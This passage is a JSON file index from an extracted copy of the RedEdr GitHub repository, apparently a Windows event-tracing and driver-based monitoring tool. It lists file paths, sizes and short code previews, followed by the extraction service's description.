    "preview": "\n// Function to display events in Tab 1\nfunction displayEvents(events) {\n    const eventContainer = document.getElementB"
  },
  {
    "path": "RedEdr/webserver.cpp",
    "chars": 12933,
    "preview": "#include <iostream>\n#include <vector>\n#include <atomic>\n#include <windows.h>\n\n#include \"httplib.h\" // Needs to be on top"
  },
  {
    "path": "RedEdr/webserver.h",
    "chars": 185,
    "preview": "#pragma once\n\n#include <Windows.h>\n#include <vector>\n\nDWORD WINAPI WebserverThread(LPVOID param);\nint InitializeWebServe"
  },
  {
    "path": "RedEdr.sln",
    "chars": 12956,
    "preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 17\nVisualStudioVersion = 17.5.3353"
  },
  {
    "path": "RedEdrDll/RedEdrDll.filters",
    "chars": 2676,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
  },
  {
    "path": "RedEdrDll/RedEdrDll.vcxproj",
    "chars": 9630,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
  },
  {
    "path": "RedEdrDll/RedEdrDll.vcxproj.filters",
    "chars": 944,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
  },
  {
    "path": "RedEdrDll/detours.h",
    "chars": 43139,
    "preview": "/////////////////////////////////////////////////////////////////////////////\n//\n//  Core Detours Functionality (detours"
  },
  {
    "path": "RedEdrDll/dllhelper.cpp",
    "chars": 4777,
    "preview": "#include \"dllhelper.h\"\n#include \"../Shared/common.h\"\n#include <dbghelp.h>\n#include <thread>\n#include <mutex>\n\n#include \""
  },
  {
    "path": "RedEdrDll/dllhelper.h",
    "chars": 306,
    "preview": "#pragma once\n#include <windows.h>\n#include <winternl.h>  // needs to be on bottom?\n// Pipe\nvoid InitDllPipe();\nvoid Send"
  },
  {
    "path": "RedEdrDll/dllmain.cpp",
    "chars": 68761,
    "preview": "#include <Windows.h>\n#include \"../Shared/common.h\"\n#include <winternl.h>  // needs to be on bottom?\n\n#include \"dllhelper"
  },
  {
    "path": "RedEdrDll/framework.h",
    "chars": 149,
    "preview": "#pragma once\n\n#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers\n// Windows Heade"
  },
  {
    "path": "RedEdrDll/logging.cpp",
    "chars": 788,
    "preview": "#include <windows.h>\n#include <stdio.h>\n#include \"../Shared/common.h\"\n\nvoid LOG_A(int verbosity, const char* format, ..."
  },
  {
    "path": "RedEdrDll/logging.h",
    "chars": 151,
    "preview": "#pragma once\n\n#include \"../Shared/common.h\"\nvoid LOG_W(int verbosity, const wchar_t* format, ...);\nvoid LOG_A(int verbos"
  },
  {
    "path": "RedEdrDriver/Driver.c",
    "chars": 11872,
    "preview": "#include <Ntifs.h>\n#include <ntddk.h>\n\n// Needs to be set on the project properties as well\n#pragma comment(lib, \"FltMgr"
  },
  {
    "path": "RedEdrDriver/MyDumbEDRDriver.inf",
    "chars": 2339,
    "preview": ";\n; MyDumbEDRDriver.inf\n;\n\n[Version]\nSignature=\"$WINDOWS NT$\"\nClass=System ; TODO: specify appropriate Class\nClassGuid={"
  },
  {
    "path": "RedEdrDriver/RedEdrDriver.inf",
    "chars": 2246,
    "preview": ";\n; RedEdrDriver.inf\n;\n\n[Version]\nSignature=\"$WINDOWS NT$\"\nClass=System ; TODO: specify appropriate Class\nClassGuid={4d3"
  },
  {
    "path": "RedEdrDriver/RedEdrDriver.vcxproj",
    "chars": 6135,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"12.0\" xmlns=\"http://schemas.micros"
  },
  {
    "path": "RedEdrDriver/RedEdrDriver.vcxproj.filters",
    "chars": 2337,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
  },
  {
    "path": "RedEdrDriver/hashcache.c",
    "chars": 3255,
    "preview": "#include <Ntifs.h>\n#include <ntddk.h>\n\n#include \"hashcache.h\"\n\n\nPHASH_ENTRY HashTable[HASH_TABLE_SIZE];\nKSPIN_LOCK HashT"
  },
  {
    "path": "RedEdrDriver/hashcache.h",
    "chars": 736,
    "preview": "#pragma once\n\n#include <ntddk.h>\n#include <stdio.h>\n\n\n#define PROC_NAME_LEN 128\n\ntypedef struct _PROCESS_INFO {\n    HAND"
  },
  {
    "path": "RedEdrDriver/kapcinjector.c",
    "chars": 11620,
    "preview": "\n#include <ntifs.h>\n// from https://github.com/0xOvid/RootkitDiaries/\n\n\n// set dispach drivers\n\n/*\nPsSetLoadImageNotifyR"
  },
  {
    "path": "RedEdrDriver/kapcinjector.h",
    "chars": 110,
    "preview": "#pragma once\n\nint KapcInjectDll(IN PUNICODE_STRING ImageName, IN HANDLE ProcessId, IN PIMAGE_INFO pImageInfo);"
  },
  {
    "path": "RedEdrDriver/kcallbacks.c",
    "chars": 26500,
    "preview": "#include <Ntifs.h>\n#include <ntddk.h>\n#include <ntstrsafe.h>\n\n#include \"upipe.h\"\n#include \"kapcinjector.h\"\n#include \"kca"
  },
  {
    "path": "RedEdrDriver/kcallbacks.h",
    "chars": 1537,
    "preview": "#pragma once\n\n#include <Ntifs.h>\n#include <ntddk.h>\n\n\n#define TD_CALLBACK_REGISTRATION_TAG  '0bCO' // TD_CALLBACK_REGIST"
  },
  {
    "path": "RedEdrDriver/settings.c",
    "chars": 462,
    "preview": "\n#include \"settings.h\"\n\n\nSettings g_Settings;\n\n\nvoid init_settings() {\n\tg_Settings.init_processnotify = 1;\n\tg_Settings.i"
  },
  {
    "path": "RedEdrDriver/settings.h",
    "chars": 528,
    "preview": "#pragma once\n\n#include <ntddk.h>\n\n#include \"../Shared/common.h\"\n\ntypedef struct _Settings{\n\tint init_processnotify;\n\tint"
  },
  {
    "path": "RedEdrDriver/upipe.c",
    "chars": 3475,
    "preview": "#include <Ntifs.h>\n#include <ntddk.h>\n\n#include \"../Shared/common.h\"\n#include \"utils.h\"\n#include \"upipe.h\"\n\n\n// Handle t"
  },
  {
    "path": "RedEdrDriver/upipe.h",
    "chars": 194,
    "preview": "#pragma once\n\n// Function declarations\nvoid InitializePipe();\nvoid CleanupPipe();\nint LogEvent(char*);\nint IsUserspacePi"
  },
  {
    "path": "RedEdrDriver/utils.c",
    "chars": 3366,
    "preview": "#include <Ntifs.h>\n#include <ntstrsafe.h>  // Required for RtlStringCbVPrintfA\n\n#include \"../Shared/common.h\"\n\n#define K"
  },
  {
    "path": "RedEdrDriver/utils.h",
    "chars": 423,
    "preview": "#pragma once\n#include <stdio.h>\n#include <Ntifs.h>\n\n\nvoid LOG_A(int severity, char* format, ...);\nint IsSubstringInUnico"
  },
  {
    "path": "RedEdrPplService/README.md",
    "chars": 848,
    "preview": "# RedEdr PPL Service\n\n* Used to consume ETW-TI\n* Will send it via pipe to main RedEdr\n* Requires to be started as PPL se"
  },
  {
    "path": "RedEdrPplService/RedEdrPplService.cpp",
    "chars": 4780,
    "preview": "#include <Windows.h>\n\n#include \"../Shared/common.h\"\n#include \"etwtireader.h\"\n#include \"control.h\"\n#include \"logging.h\"\n#"
  },
  {
    "path": "RedEdrPplService/RedEdrPplService.vcxproj",
    "chars": 9738,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
  },
  {
    "path": "RedEdrPplService/RedEdrPplService.vcxproj.filters",
    "chars": 3049,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
  },
  {
    "path": "RedEdrPplService/control.cpp",
    "chars": 9031,
    "preview": "#include <Windows.h>\n\n#include \"control.h\"\n#include \"emitter.h\"\n#include \"../Shared/common.h\"\n#include \"logging.h\"\n#incl"
  },
  {
    "path": "RedEdrPplService/control.h",
    "chars": 87,
    "preview": "#pragma once\n\nextern BOOL g_ServiceStopping;\n\nvoid StartControl();\nvoid StopControl();\n"
  },
  {
    "path": "RedEdrPplService/emitter.cpp",
    "chars": 695,
    "preview": "#include <Windows.h>\n\n#include \"../Shared/common.h\"\n#include \"piping.h\"\n#include \"logging.h\"\n\n\nPipeClient pipeClient(\"Re"
  },
  {
    "path": "RedEdrPplService/emitter.h",
    "chars": 129,
    "preview": "#pragma once\n\n#include <Windows.h>\n\nvoid SendEmitterPipe(char* buffer);\nBOOL ConnectEmitterPipe();\nvoid DisconnectEmitte"
  },
  {
    "path": "RedEdrPplService/etwtihandler.cpp",
    "chars": 4192,
    "preview": "#include <windows.h>\n#include <evntrace.h>\n#include <tdh.h>\n#include <string>\n\n#include \"etwtihandler.h\"\n#include \"loggi"
  },
  {
    "path": "RedEdrPplService/etwtihandler.h",
    "chars": 421,
    "preview": "#pragma once\n\n#include <evntrace.h>\n#include <vector>\n#include <string>\n\n#include <krabs.hpp>\n\nvoid event_callback(const"
  },
  {
    "path": "RedEdrPplService/etwtireader.cpp",
    "chars": 2452,
    "preview": "#include <windows.h>\n#include <evntrace.h>\n#include <tdh.h>\n#include <krabs.hpp>\n\n\n#include \"etwtireader.h\"\n#include \"et"
  },
  {
    "path": "RedEdrPplService/etwtireader.h",
    "chars": 54,
    "preview": "\nvoid StartEtwtiReader();\nvoid ShutdownEtwtiReader();\n"
  },
  {
    "path": "RedEdrPplService/logging.cpp",
    "chars": 3619,
    "preview": "#include <iostream>\n#include <windows.h>\n\n#include <chrono>\n#include <ctime>\n#include <iomanip>\n#include <sstream>\n#incl"
  },
  {
    "path": "RedEdrPplService/logging.h",
    "chars": 202,
    "preview": "#include \"../Shared/common.h\"\n\nvoid LOG_W(int verbosity, const wchar_t* format, ...);\nvoid LOG_A(int verbosity, const ch"
  },
  {
    "path": "RedEdrPplService/packages.config",
    "chars": 155,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packages>\n  <package id=\"Microsoft.O365.Security.Krabsetw\" version=\"4.4.3\" targ"
  },
  {
    "path": "RedEdrPplService/uthash.h",
    "chars": 73991,
    "preview": "/*\nCopyright (c) 2003-2022, Troy D. Hanson  https://troydhanson.github.io/uthash/\nAll rights reserved.\n\nRedistribution a"
  },
  {
    "path": "RedEdrShared/RedEdrShared.vcxproj",
    "chars": 8690,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
  },
  {
    "path": "RedEdrShared/RedEdrShared.vcxproj.filters",
    "chars": 2810,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
  },
  {
    "path": "RedEdrShared/etw_krabs.cpp",
    "chars": 4655,
    "preview": "#include <Windows.h>\n#include <iostream>\n#include <string>\n#include <sstream>\n#include <krabs.hpp>\n#include \"json.hpp\"\n\n"
  },
  {
    "path": "RedEdrShared/etw_krabs.h",
    "chars": 132,
    "preview": "\n#include <krabs.hpp>\n#include <json.hpp>\n\nnlohmann::json KrabsEtwEventToJsonStr(const EVENT_RECORD& record, krabs::sche"
  },
  {
    "path": "RedEdrShared/json.hpp",
    "chars": 939118,
    "preview": "//     __ _____ _____ _____\n//  __|  |   __|     |   | |  JSON for Modern C++\n// |  |  |__   |  |  | | | |  version 3.11"
  },
  {
    "path": "RedEdrShared/loguru.cpp",
    "chars": 60555,
    "preview": "#if defined(__GNUC__) || defined(__clang__)\n// Disable all warnings from gcc/clang:\n#pragma GCC diagnostic push\n#pragma "
  },
  {
    "path": "RedEdrShared/loguru.hpp",
    "chars": 56595,
    "preview": "/*\nLoguru logging library for C++, by Emil Ernerfeldt.\nwww.github.com/emilk/loguru\nIf you find Loguru useful, please let"
  },
  {
    "path": "RedEdrShared/mypeb.h",
    "chars": 9220,
    "preview": "#pragma once\n\n#include <stdio.h>\n#include <windows.h>\n#include <iostream>\n#include <string>\n#include <vector>\n\n\n// https"
  },
  {
    "path": "RedEdrShared/myprocess.cpp",
    "chars": 6127,
    "preview": "#include <windows.h>\n#include <iostream>\n#include <string>\n#include <vector>\n#include <tlhelp32.h>\n\n#include \"myprocess."
  },
  {
    "path": "RedEdrShared/myprocess.h",
    "chars": 821,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <string>\n#include <vector>\n\n#include \"process_query.h\"\n#include \"process_mem"
  },
  {
    "path": "RedEdrShared/packages.config",
    "chars": 155,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packages>\n  <package id=\"Microsoft.O365.Security.Krabsetw\" version=\"4.4.3\" targ"
  },
  {
    "path": "RedEdrShared/piping.cpp",
    "chars": 11136,
    "preview": "\n#include <Windows.h>\n#include <sddl.h>\n#include <iostream>\n#include <vector>\n#include <string>\n\n#include \"piping.h\"\n#in"
  },
  {
    "path": "RedEdrShared/piping.h",
    "chars": 1392,
    "preview": "#pragma once\n\n#include <Windows.h>\n#include <vector>\n#include <string>\n#include <mutex>\n\n#include \"../Shared/common.h\"\n\n"
  },
  {
    "path": "RedEdrShared/process_mem_static.cpp",
    "chars": 2061,
    "preview": "#include <windows.h>\n#include <vector>\n#include <string>\n\n#include \"process_mem_static.h\"\n\n\nMemStatic::MemStatic() {\n}\n\n"
  },
  {
    "path": "RedEdrShared/process_mem_static.h",
    "chars": 859,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <string>\n\n#include \"ranges.h\"\n#include \"json.hpp\"\n\n\n\nclass"
  },
  {
    "path": "RedEdrShared/process_query.cpp",
    "chars": 20619,
    "preview": "#include <windows.h>\n#include <wintrust.h>\n#include <wincrypt.h>\n#include <iostream>\n#include <string>\n#include <vector>"
  },
  {
    "path": "RedEdrShared/process_query.h",
    "chars": 1455,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <string>\n#include <iostream>\n\n\nstd::wstring GetProcessName"
  },
  {
    "path": "RedEdrShared/process_resolver.cpp",
    "chars": 9113,
    "preview": "#include <windows.h>\n#include <iostream>\n#include <unordered_map>\n#include <mutex>\n#include <thread>\n#include <atomic>\n#"
  },
  {
    "path": "RedEdrShared/process_resolver.h",
    "chars": 1221,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <unordered_map>\n#include <thread>\n#include <atomic>\n#include <chrono>\n\n#incl"
  },
  {
    "path": "RedEdrShared/ranges.cpp",
    "chars": 21,
    "preview": "\n#include \"ranges.h\"\n"
  },
  {
    "path": "RedEdrShared/ranges.h",
    "chars": 3091,
    "preview": "#pragma once\n\n#include <Windows.h>\n#include <iostream>\n#include <algorithm>\n#include <vector>\n#include <utility>\n\n\nclass"
  },
  {
    "path": "RedEdrShared/utils.cpp",
    "chars": 13778,
    "preview": "#include <vector>\n#include <algorithm>\n#include <locale>\n#include <sstream>\n#include <iostream>\n#include <fstream>\n#incl"
  },
  {
    "path": "RedEdrShared/utils.h",
    "chars": 1436,
    "preview": "#pragma once\n\n#include <windows.h>\n#include <iostream>\n#include <string>\n\n\nvoid PrintWcharBufferAsHex(const wchar_t* buf"
  },
  {
    "path": "RedEdrTester/RedEdrTester.cpp",
    "chars": 5113,
    "preview": "#include <stdio.h>\n#include <windows.h>\n#include <cwchar>\n#include <cstdlib>\n#include <string>\n#include <sstream>\n#inclu"
  },
  {
    "path": "RedEdrTester/RedEdrTester.vcxproj",
    "chars": 8796,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
  },
  {
    "path": "RedEdrTester/RedEdrTester.vcxproj.filters",
    "chars": 2919,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
  },
  {
    "path": "RedEdrTester/packages.config",
    "chars": 155,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packages>\n  <package id=\"Microsoft.O365.Security.Krabsetw\" version=\"4.4.3\" targ"
  },
  {
    "path": "Shared/common.h",
    "chars": 1258,
    "preview": "#pragma once\n\n#ifndef COMMON_H\n#define COMMON_H\n\n#define PIPE_BUFFER_SIZE 8192 // thats the pipe buffer (default 4096)\n#"
  },
  {
    "path": "UnitTests/UnitTestAnalyzer.cpp",
    "chars": 298,
    "preview": "//#include \"pch.h\"\n#include \"CppUnitTest.h\"\n\n#include \"utils.h\"\n#include \"json.hpp\"\n#include \"logging.h\"\n\n\nusing namespa"
  },
  {
    "path": "UnitTests/UnitTestEventProducer.cpp",
    "chars": 820,
    "preview": "//#include \"pch.h\"\n#include \"CppUnitTest.h\"\n\n#include \"event_aggregator.h\"\n#include \"utils.h\"\n#include \"json.hpp\"\n#inclu"
  },
  {
    "path": "UnitTests/UnitTestProcessInfo.cpp",
    "chars": 4795,
    "preview": "//#include \"pch.h\"\n\n#include <windows.h>\n#include <tlhelp32.h>\n#include <tchar.h>\n#include <iostream>\n\n#include \"CppUnit"
  },
  {
    "path": "UnitTests/UnitTestRanges.cpp",
    "chars": 2592,
    "preview": "#include \"CppUnitTest.h\"\n\n#include \"logging.h\"\n#include \"ranges.h\"\n\nusing namespace Microsoft::VisualStudio::CppUnitTest"
  },
  {
    "path": "UnitTests/UnitTests.cpp",
    "chars": 728,
    "preview": "#include \"CppUnitTest.h\"\n\n#include \"utils.h\"\n\nusing namespace Microsoft::VisualStudio::CppUnitTestFramework;\n\nnamespace "
  },
  {
    "path": "UnitTests/UnitTests.vcxproj",
    "chars": 9480,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
  },
  {
    "path": "UnitTests/UnitTests.vcxproj.filters",
    "chars": 2785,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
  },
  {
    "path": "UnitTests/logging.cpp",
    "chars": 1116,
    "preview": "#include <iostream>\n#include <windows.h>\n#include <dbghelp.h>\n#include <stdio.h>\n#include \"../Shared/common.h\"\n#include "
  },
  {
    "path": "UnitTests/logging.h",
    "chars": 151,
    "preview": "#pragma once\n\n#include \"../Shared/common.h\"\nvoid LOG_W(int verbosity, const wchar_t* format, ...);\nvoid LOG_A(int verbos"
  },
  {
    "path": "UnitTests/notepad.json",
    "chars": 90768,
    "preview": "[{\"type\":\"kernel\",\"time\":\"133737987376815797\",\"callback\":\"create_process\",\"krn_pid\":\"5648\",\"pid\":\"1704\",\"name\":\"\\\\Device"
  },
  {
    "path": "azure_config.json.sample",
    "chars": 152,
    "preview": "{\n  \"StorageAccount\": \"detonator1\",\n  \"ContainerName\": \"scripts\",\n  \"BlobName\": \"rededr.zip\",\n  \"FilePath\": \"C:\\\\rededr\\"
  },
  {
    "path": "azure_upload.ps1",
    "chars": 913,
    "preview": "# Load config\n$config = Get-Content -Raw -Path \".\\azure_config.json\" | ConvertFrom-Json\n\n# cleanup\n$path = \"C:\\rededr\\da"
  },
  {
    "path": "elam_driver/elam_driver.c",
    "chars": 481,
    "preview": "#include <ntddk.h>\n#include <wdf.h>\n#include <windowsx.h>\n\nDRIVER_INITIALIZE DriverEntry;\n\n#ifdef ALLOC_PRAGMA\n#pragma a"
  },
  {
    "path": "elam_driver/elam_driver.rc",
    "chars": 422,
    "preview": "#include <windows.h>\n#include <ntverp.h>\n\n#define VER_FILETYPE             VFT_DRV\n#define VER_FILESUBTYPE          VFT2"
  },
  {
    "path": "elam_driver/elam_driver.vcxproj",
    "chars": 5285,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"12.0\" xmlns=\"http://schemas.micros"
  },
  {
    "path": "elam_driver/elam_driver.vcxproj.Filters",
    "chars": 1265,
    "preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
  },
  {
    "path": "generate_cert.ps1",
    "chars": 5215,
    "preview": "$password = \"password\"\n\n# This is very, very graciouslly taken from Matt G!\n# https://gist.github.com/mattifestation/660"
  },
  {
    "path": "rededr_test.ps1",
    "chars": 1816,
    "preview": "# RedEdr Test Script\n# Starts RedEdr, traces procexp64.exe, then cleans up\n\n$rededrPath = \"C:\\RedEdr\\RedEdr.exe\"\n#$targe"
  },
  {
    "path": "sign_file.ps1",
    "chars": 185,
    "preview": "# Change this:\n$password = \"password\"\n\n\n# signtool.exe sign /fd SHA256 /a /v /ph /f $args[0] /p $password $args[1]\nsignt"
  }
]

// ... and 2 more files (download for full content)

About this extraction

This page contains the full source code of the dobin/RedEdr GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 146 files (2.3 MB), approximately 615.1k tokens, and a symbol index with 1246 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.

Extract another repo